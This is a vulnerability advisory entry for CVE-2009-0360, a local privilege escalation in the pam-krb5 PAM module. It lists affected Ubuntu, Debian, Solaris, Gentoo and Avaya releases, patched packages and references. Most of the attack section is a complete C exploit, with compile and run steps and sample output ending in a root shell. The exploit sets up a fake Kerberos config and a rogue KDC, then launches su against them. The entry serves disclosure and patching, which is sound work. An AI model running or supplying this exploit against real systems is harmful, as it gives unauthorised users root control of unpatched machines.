Written by Russ Allbery
Monday, 30 March 2009 22:06
pam-krb5 Local Privilege Escalation Vulnerability
-\\Bugtraq ID: 33740
-\\Class: Design Error
-\\CVE: CVE-2009-0360
-\\Remote: No
-\\Local: Yes
-\\Published: Feb 11 2009 12:00AM
-\\Updated: Mar 30 2009 08:46PM
-\\Credit: Russ Allbery
-\\Vulnerable:
Ubuntu Ubuntu Linux 8.10 sparc, Ubuntu Ubuntu Linux 8.10 powerpc, Ubuntu Ubuntu Linux 8.10 lpia, Ubuntu Ubuntu Linux 8.10 i386, Ubuntu Ubuntu Linux 8.10 amd64, Ubuntu Ubuntu Linux 8.04 LTS sparc, Ubuntu Ubuntu Linux 8.04 LTS powerpc, Ubuntu Ubuntu Linux 8.04 LTS lpia, Ubuntu Ubuntu Linux 8.04 LTS i386, Ubuntu Ubuntu Linux 8.04 LTS amd64, Ubuntu Ubuntu Linux 7.10 sparc, Ubuntu Ubuntu Linux 7.10 powerpc, Ubuntu Ubuntu Linux 7.10 lpia, Ubuntu Ubuntu Linux 7.10 i386, Ubuntu Ubuntu Linux 7.10 amd64, Ubuntu Ubuntu Linux 7.04 sparc, Ubuntu Ubuntu Linux 7.04 powerpc, Ubuntu Ubuntu Linux 7.04 i386, Ubuntu Ubuntu Linux 7.04 amd64, Ubuntu Ubuntu Linux 6.10 sparc, Ubuntu Ubuntu Linux 6.10 powerpc, Ubuntu Ubuntu Linux 6.10 i386, Ubuntu Ubuntu Linux 6.10 amd64, Ubuntu Ubuntu Linux 6.06 LTS sparc, Ubuntu Ubuntu Linux 6.06 LTS powerpc, Ubuntu Ubuntu Linux 6.06 LTS i386, Ubuntu Ubuntu Linux 6.06 LTS amd64
Sun Solaris 9_x86, Sun Solaris 9, Sun Solaris 8_x86, Sun Solaris 8, Sun Solaris 10_x86, Sun Solaris 10, Sun SEAM 1.0.1, Sun OpenSolaris build snv_99, Sun OpenSolaris build snv_96, Sun OpenSolaris build snv_95, Sun OpenSolaris build snv_92, Sun OpenSolaris build snv_91, Sun OpenSolaris build snv_90, Sun OpenSolaris build snv_89, Sun OpenSolaris build snv_88, Sun OpenSolaris build snv_87, Sun OpenSolaris build snv_86, Sun OpenSolaris build snv_85, Sun OpenSolaris build snv_84, Sun OpenSolaris build snv_83, Sun OpenSolaris build snv_82, Sun OpenSolaris build snv_81, Sun OpenSolaris build snv_80, Sun OpenSolaris build snv_78, Sun OpenSolaris build snv_77, Sun OpenSolaris build snv_76, Sun OpenSolaris build snv_68, Sun OpenSolaris build snv_67, Sun OpenSolaris build snv_64, Sun OpenSolaris build snv_61, Sun OpenSolaris build snv_59, Sun OpenSolaris build snv_57, Sun OpenSolaris build snv_50, Sun OpenSolaris build snv_39, Sun OpenSolaris build snv_36, Sun OpenSolaris build snv_29, Sun OpenSolaris build snv_22, Sun OpenSolaris build snv_19, Sun OpenSolaris build snv_13, Sun OpenSolaris build snv_108, Sun OpenSolaris build snv_107, Sun OpenSolaris build snv_106, Sun OpenSolaris build snv_105, Sun OpenSolaris build snv_104, Sun OpenSolaris build snv_103, Sun OpenSolaris build snv_102, Sun OpenSolaris build snv_101a, Sun OpenSolaris build snv_101, Sun OpenSolaris build snv_100, Sun OpenSolaris build snv_02, Sun OpenSolaris build snv_01, Sun OpenSolaris 0
Russ Allbery pam-krb5 0, Pardus Linux 2008 0, Gentoo Linux
Debian Linux 3.1 sparc, Debian Linux 3.1 s/390, Debian Linux 3.1 ppc, Debian Linux 3.1 mipsel, Debian Linux 3.1 mips, Debian Linux 3.1 m68k, Debian Linux 3.1 ia-64, Debian Linux 3.1 ia-32, Debian Linux 3.1 hppa, Debian Linux 3.1 arm, Debian Linux 3.1 amd64, Debian Linux 3.1 alpha, Debian Linux 3.1, Debian Linux 3.0 sparc, Debian Linux 3.0 s/390, Debian Linux 3.0 ppc, Debian Linux 3.0 mipsel, Debian Linux 3.0 mips, Debian Linux 3.0 m68k, Debian Linux 3.0 ia-64, Debian Linux 3.0 ia-32, Debian Linux 3.0 hppa, Debian Linux 3.0 arm, Debian Linux 3.0 alpha, Debian Linux 3.0, Debian Linux 4.0 sparc, Debian Linux 4.0 s/390, Debian Linux 4.0 powerpc, Debian Linux 4.0 mipsel, Debian Linux 4.0 mips, Debian Linux 4.0 m68k, Debian Linux 4.0 ia-64, Debian Linux 4.0 ia-32, Debian Linux 4.0 hppa, Debian Linux 4.0 arm, Debian Linux 4.0 amd64, Debian Linux 4.0 alpha, Debian Linux 4.0
Avaya CMS Server 13.0, Avaya CMS Server 15.0, Avaya CMS Server 14.1, Avaya CMS Server 14.0, Avaya CMS Server 13.1
-\\Not Vulnerable: Russ Allbery pam-krb5 3.13
-\\Discussion: The 'pam-krb5' library is prone to a local privilege-escalation vulnerability because it does not initialize the Kerberos libraries for setuid use, so a setuid process honours Kerberos configuration supplied through the caller's environment.
Local attackers may exploit this issue to gain elevated privileges, which may lead to a complete compromise of the system.
This issue affects pam-krb5 as shipped with Debian, Ubuntu, and Gentoo Linux releases; other versions may also be vulnerable.
-\\Exploit(s)/PoC(s): An exploit is available:

===============================================================
33740.c
^^^^^^^^
/*
 * cve-2009-0360.c
 *
 * pam-krb5 < 3.13 local privilege escalation
 * Jon Oberheide <e-mail address removed>
 * http://jon.oberheide.org
 *
 * Information:
 *
 * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0360
 *
 * pam-krb5 before 3.13, when linked against MIT Kerberos, does not properly
 * initialize the Kerberos libraries for setuid use, which allows local
 * users to gain privileges by pointing an environment variable to a
 * modified Kerberos configuration file, and then launching a PAM-based
 * setuid application.
 *
 * Usage:
 *
 * $ gcc cve-2009-0360.c -o cve-2009-0360
 * $ ./cve-2009-0360
 * [+] creating krb5.conf
 * [+] creating kdc.conf
 * [+] creating kerberos database
 * Loading random data
 * Initializing database '/tmp/cve-2009-0360/principal' for realm 'TEST.COM',
 * master key name 'K/M@TEST.COM'
 * [+] adding principal root@TEST.COM
 * Authenticating as principal root@TEST.COM with password.
 * Enter KDC database master key:
 * WARNING: no policy specified for root@TEST.COM; defaulting to no policy
 * Principal "root@TEST.COM" created.
 * [+] launching krb5kdc on 141.212.110.163:6666
 * [+] launching su with fake KDC configuration
 * [+] enter "root" at the password prompt
 * Password:
 * # id
 * uid=0(root) gid=0(root) ...
 *
 * Notes:
 *
 * This exploit will result in local privilege escalation on hosts that use
 * the pam-krb5 module for su authentication. Check the su and system-auth
 * PAM configuration files in /etc/pam.d to determine if pam-krb5 is in use.
 * Some customization of the defined constants and paths may be necessary
 * for your environment. Be sure to set FAKE_KDC_HOST to the IP address of
 * an active non-loopback interface on the target machine.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>

#define REALM          "TEST.COM"
#define FAKE_KDC_HOST  "141.212.110.163"
#define FAKE_KDC_PORT  "6666"
#define PRINCIPAL_NAME "root"
#define PRINCIPAL_PASS "root"
#define TMP_DIR        "/tmp/cve-2009-0360"
#define KUTIL_PATH     "/usr/sbin/kdb5_util"
#define KADMIN_PATH    "/usr/sbin/kadmin.local"
#define KRB5KDC_PATH   "/usr/sbin/krb5kdc"

/* Contents of the krb5.conf written to TMP_DIR; adjacent string literals
 * are concatenated by the compiler. */
#define KRB5_CONF \
    "[libdefaults]\n\tdefault_realm = " REALM "\n\n[realms]\n\t" REALM \
    " = {\n\t\tadmin_server = " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n\t\t" \
    "default_domain = " REALM "\n\t\tkdc = " FAKE_KDC_HOST ":" FAKE_KDC_PORT \
    "\n\t}\n\n[domain_realm]\n\t." REALM " = " REALM "\n\t" REALM " = " REALM

/* Contents of the kdc.conf for the locally started KDC. */
#define KDC_CONF \
    "[kdcdefaults]\n\tkdc_ports = " FAKE_KDC_PORT "\n\n[realms]\n\t" REALM \
    " = {\n\t\tdatabase_name = " TMP_DIR "/principal\n\t\tadmin_keytab = " \
    "FILE:" TMP_DIR "/kadm5.keytab\n\t\tacl_file = " TMP_DIR "/kadm5.acl" \
    "\n\t\tkey_stash_file = " TMP_DIR "/stash\n\t\tkdc_ports = " FAKE_KDC_PORT \
    "\n\t\tmax_life = 10h 0m 0s\n\t\tmax_renewable_life = 7d 0h 0m 0s\n\t}"

int main(void)
{
    int ret;
    FILE *fp;
    char *err;

    /* An already existing TMP_DIR is not an error. */
    ret = mkdir(TMP_DIR, 0755);
    if (ret == -1 && errno != EEXIST) {
        err = "cannot create TMP_DIR";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }

    printf("[+] creating krb5.conf\n");
    sleep(1);

    fp = fopen(TMP_DIR "/krb5.conf", "w");
    if (!fp) {
        err = "cannot open krb5.conf";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    fwrite(KRB5_CONF, 1, strlen(KRB5_CONF), fp);
    fclose(fp);

    printf("[+] creating kdc.conf\n");
    sleep(1);

    fp = fopen(TMP_DIR "/kdc.conf", "w");
    if (!fp) {
        err = "cannot open kdc.conf";
        printf("[-] Error: %s (%s)\n", err, strerror(errno));
        return 1;
    }
    fwrite(KDC_CONF, 1, strlen(KDC_CONF), fp);
    fclose(fp);

    chdir(TMP_DIR);

    printf("[+] creating kerberos database\n");
    sleep(1);

    ret = system(KUTIL_PATH " create -d " TMP_DIR "/principal -sf " TMP_DIR
                 "/stash -r " REALM " -s -P \"\"");
    if (WEXITSTATUS(ret) != 0) {
        err = "kdb5_util command returned non-zero";
        printf("[-] Error: %s, continuing exploit anyway\n", err);
    }

    printf("[+] adding principal " PRINCIPAL_NAME "@" REALM "\n");
    sleep(1);

    ret = system("echo \"\" | " KADMIN_PATH " -m -p " PRINCIPAL_NAME "@" REALM
                 " -d " TMP_DIR "/principal -r " REALM " -q \"add_principal "
                 "-pw " PRINCIPAL_PASS " " PRINCIPAL_NAME "@" REALM "\"");
    if (WEXITSTATUS(ret) != 0) {
        err = "kadmin.local command returned non-zero";
        printf("[-] Error: %s, continuing exploit anyway\n", err);
    }

    printf("[+] launching krb5kdc on " FAKE_KDC_HOST ":" FAKE_KDC_PORT "\n");
    sleep(1);

    ret = system("KRB5_KDC_PROFILE=\"" TMP_DIR "/kdc.conf\" " KRB5KDC_PATH
                 " -d " TMP_DIR "/principal -r " REALM);
    if (WEXITSTATUS(ret) != 0) {
        err = "krb5kdc command returned non-zero";
        printf("[-] Error: %s, continuing exploit anyway\n", err);
    }

    printf("[+] launching su with fake KDC configuration\n");
    sleep(1);
    printf("[+] enter \"" PRINCIPAL_PASS "\" at the password prompt\n");
    sleep(1);

    system("KRB5_CONFIG=\"" TMP_DIR "/krb5.conf\" su");

    return 0;
}
-\\Solution: Updates are available. Please see the references for more information.
Debian Linux 4.0 amd64 --Debian libpam-krb5_2.6-1etch1_amd64.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_amd64.deb
Debian Linux 4.0 ia-32 --Debian libpam-krb5_2.6-1etch1_i386.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_i386.deb
Debian Linux 4.0 hppa --Debian libpam-krb5_2.6-1etch1_hppa.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_hppa.deb
Debian Linux 4.0 mipsel --Debian libpam-krb5_2.6-1etch1_mipsel.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mipsel.deb
Debian Linux 4.0 ia-64 --Debian libpam-krb5_2.6-1etch1_ia64.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_ia64.deb
Debian Linux 4.0 mips --Debian libpam-krb5_2.6-1etch1_mips.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_mips.deb
Debian Linux 4.0 arm --Debian libpam-krb5_2.6-1etch1_arm.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_arm.deb
Debian Linux 4.0 powerpc --Debian libpam-krb5_2.6-1etch1_powerpc.deb http://security.debian.org/pool/updates/main/libp/libpam-krb5/libpam-krb5_2.6-1etch1_powerpc.deb
-\\Reference(s):
--PAM module for MIT Kerberos http://packages.debian.org/etch/libpam-krb (Debian)
--pam-krb5 security advisory (3.12 and earlier) http://www.securityfocus.com/archive/1/50089 (Russ Allbery)
--Re: pam-krb5 security advisory (3.12 and earlier) http://www.securityfocus.com/archive/1/50089 (Tim Skirvin)
--ASA-2009-070 (SUN 252767) http://support.avaya.com/elmodocs2/security/ASA-2009-070.ht (Avaya)
--Solution 252767: A Security Vulnerability in the Solaris Kerberos PAM Module http://sunsolve.sun.com/search/document.do?assetkey=1-66-252767- (Sun)